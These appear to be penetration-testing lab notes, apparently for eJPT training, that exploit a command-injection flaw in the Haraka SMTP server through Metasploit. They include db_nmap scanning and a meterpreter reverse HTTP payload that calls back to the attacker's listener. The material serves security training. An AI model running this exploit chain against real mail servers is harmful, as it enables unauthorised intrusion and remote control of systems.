🔬 Vulnerable SMTP Server
ip -br -c a
service postgresql start && msfconsole -q
db_status
setg RHOSTS 192.109.36.3
setg RHOST 192.109.36.3
workspace -a SMTP_haraka
- Perform an
nmap
scan directly into MSF
db_nmap -sV -O 192.109.36.3
![db_nmap -sV -O 192.109.36.3](/syselement/ine-notes/raw/main/ejpt/hostnetwork-penetration-testing/3-metasploit/.gitbook/assets/image-20230416143927400.png)
search libssh_auth_bypass
use exploit/linux/smtp/haraka
info
# Description:
# The Haraka SMTP server comes with a plugin for processing
# attachments. Versions before 2.8.9 can be vulnerable to command
# injection
options
set SRVPORT 9898
set email_to [email protected]
set payload linux/x64/meterpreter_reverse_http
set LHOST eth1
set LPORT 8080
run
# This is a NON-staged payload
![Metasploit - exploit/linux/smtp/haraka](/syselement/ine-notes/raw/main/ejpt/hostnetwork-penetration-testing/3-metasploit/.gitbook/assets/image-20230416144316805.png)